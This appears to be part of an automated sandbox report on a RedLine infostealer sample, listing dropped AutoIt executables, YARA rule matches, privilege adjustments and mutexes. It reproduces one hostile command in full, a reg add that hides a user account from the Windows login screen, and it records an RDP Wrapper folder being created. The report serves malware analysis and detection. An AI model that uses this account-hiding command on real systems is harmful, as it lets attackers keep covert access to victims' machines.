              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A3A30E10_2_00A3A30E
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A2235210_2_00A22352
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A1C45C10_2_00A1C45C
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A8C5C410_2_00A8C5C4
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A728D710_2_00A728D7
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A3E92010_2_00A3E920
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A68AB410_2_00A68AB4
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A1CBB210_2_00A1CBB2
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A36B8B10_2_00A36B8B
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A2CEC010_2_00A2CEC0
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A94F4F10_2_00A94F4F
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A0D00010_2_00A0D000
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A371F910_2_00A371F9
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A0954010_2_00A09540
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A217B410_2_00A217B4
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A09A2010_2_00A09A20
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A21B2610_2_00A21B26
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A27C3B10_2_00A27C3B
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A21DD010_2_00A21DD0
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A09E8010_2_00A09E80
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A27E6A10_2_00A27E6A
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A1DF7810_2_00A1DF78
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005C80C713_2_005C80C7
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005C209713_2_005C2097
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005A21FD13_2_005A21FD
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005C235213_2_005C2352
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005DA30E13_2_005DA30E
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005BC45C13_2_005BC45C
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_0062C5C413_2_0062C5C4
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_006128D713_2_006128D7
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005DE92013_2_005DE920
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_00608AB413_2_00608AB4
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005D6B8B13_2_005D6B8B
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005BCBB213_2_005BCBB2
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005CCEC013_2_005CCEC0
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_00634F4F13_2_00634F4F
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005AD00013_2_005AD000
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005D71F913_2_005D71F9
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005A954013_2_005A9540
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005C17B413_2_005C17B4
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005A9A2013_2_005A9A20
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005C1B2613_2_005C1B26
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005C7C3B13_2_005C7C3B
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005C1DD013_2_005C1DD0
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005C7E6A13_2_005C7E6A
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005A9E8013_2_005A9E80
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005BDF7813_2_005BDF78
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com 05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: String function: 005BFE52 appears 39 times
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: String function: 005C0E50 appears 46 times
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: String function: 00C50E50 appears 46 times
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: String function: 00405041 appears 41 times
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: String function: 00A20E50 appears 46 times
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeP vs 8lOT1rXZp5.exe
              Source: 8lOT1rXZp5.exe, 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs 8lOT1rXZp5.exe
              Source: 8lOT1rXZp5.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v fsUIwEqMAc /t REG_DWORD /d "00000000" /f
              Source: 9.3.Rifiutare.exe.com.4680aa0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 9.3.Rifiutare.exe.com.4680aa0.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
              Source: 9.3.Rifiutare.exe.com.4680aa0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
              Source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
              Source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: Process Memory Space: Rifiutare.exe.com PID: 2896, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@139/54@23/2
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_0040976C wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_0040976C
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C91939 AdjustTokenPrivileges,CloseHandle,7_2_00C91939
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C91F3D LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,7_2_00C91F3D
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A61939 AdjustTokenPrivileges,CloseHandle,10_2_00A61939
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A61F3D LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00A61F3D
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_00601939 AdjustTokenPrivileges,CloseHandle,13_2_00601939
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_00601F3D LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,13_2_00601F3D
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_00402446 GetDiskFreeSpaceExW,SendMessageW,0_2_00402446
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CBADEE CreateToolhelp32Snapshot,Process32FirstW,CompareStringW,Process32NextW,CloseHandle,7_2_00CBADEE
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_004048CC _wtol,_wtol,SHGetSpecialFolderPathW,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_004048CC
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_004039F0 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,GetProcAddress,GetProcAddress,wsprintfW,GetProcAddress,0_2_004039F0
              Source: C:\Windows\System32\wscript.exeFile created: C:\Program Files\RDP Wrapper\
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeFile created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoiJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6800:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4428:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5592:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:732:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1184:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1888:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\mnop
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4020:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_03
